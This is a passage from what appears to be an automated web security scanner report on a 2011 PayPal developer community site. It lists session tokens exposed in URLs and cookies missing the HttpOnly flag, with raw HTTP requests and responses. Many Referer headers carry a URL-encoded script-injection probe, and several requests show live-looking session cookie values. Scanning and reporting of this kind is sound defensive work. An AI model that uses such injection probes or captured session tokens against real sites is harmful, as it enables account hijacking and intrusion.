Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 488
JP: D=415 t=1313157138225710
Vary: User-Agent
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.46. https://www.x.com/plugins/idea-type-plugin/resources/styles/idea.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/idea-type-plugin/resources/styles/idea.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/idea-type-plugin/resources/styles/idea.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 13894
JP: D=348 t=1313157136390261
Vary: User-Agent
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

body .jive-icon-idea-sml,
body .jive-icon-idea-med,
body .jive-icon-idea-big,
.voted-up .voted-arrow,
.voted-down .voted-arrow,
.vote-button {
   background-image: url(../images/j-ideas-sprites.png);
   _
...[SNIP]...

3.47. https://www.x.com/resources/images/status/statusicon-01.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/images/status/statusicon-01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/images/status/statusicon-01.gif;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:08 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:37:07 GMT
Cache-Control: max-age=60
Content-Type: image/gif
Vary: Accept-Encoding,User-Agent
JP: D=782 t=1313158269200189
Content-Length: 994
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive

...[SNIP]...

3.48. https://www.x.com/resources/scripts/fancyzoom/images/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/fancyzoom/images/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/fancyzoom/images/;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0closebox.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_ppv%3D22%3B%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:54:19 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 0
JP: D=1826 t=1313157260442149
Cache-Control: max-age=2016000, public
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


3.49. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:17 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 654029
JP: D=335 t=1313157137674933
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

3.50. https://www.x.com/resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:40:21 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 7809
JP: D=312 t=1313157137653284
Vary: User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

var jiveMenuTimeout;var jiveMenuIndex=-1;var jiveMenuID;function jiveKeypressMenuHandler(f){if(Element.visible(jiveMenuID)){var c=f.which||f.keyCode;var a;switch(c){case Event.KEY_DOWN:a=$(jiveMenuID)
...[SNIP]...

3.51. https://www.x.com/styles/jive-community.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /styles/jive-community.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /styles/jive-community.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:19 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:17 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 37406
JP: D=2365 t=1313157140378303
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

3.52. https://www.x.com/styles/jive-videomodule.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /styles/jive-videomodule.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /styles/jive-videomodule.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:16 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 30950
JP: D=497 t=1313157137926318
Vary: User-Agent
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

3.53. https://www.x.com/themes/paypal/images/favicon.ico

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/favicon.ico;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Etag: "3.0.7-d941befcecba314c9b3d6f0aeeb3fc0c-3638"-gzip
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1428 t=1313157148459508
Content-Length: 3638
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

...[SNIP]...

3.54. https://www.x.com/themes/paypal/images/favicon.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/favicon.png;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=1195 t=1313157136383873
Content-Length: 967
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

...[SNIP]...

3.55. https://www.x.com/themes/paypal/images/paypal_x_group_logo.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/paypal_x_group_logo.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/paypal_x_group_logo.png;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:08 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=715 t=1313158269684052
Content-Length: 1519
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

...[SNIP]...

3.56. https://www.x.com/themes/paypal/js/custom.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/js/custom.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 31770
JP: D=529 t=1313157137684424
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 222 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://www.x.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 12 Aug 2011 01:59:23 GMT
Server: Apache-Coyote/1.1
Location: https://www.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; Path=/
Set-Cookie: jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=1446 t=1313114363172657
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: NSC_xxx.y.dpn-443=44ed4e27151d;path=/


4.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.4. https://www.x.com/community/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.5. https://www.x.com/community/ppx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.6. https://www.x.com/community/ppx/adaptive_accounts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request
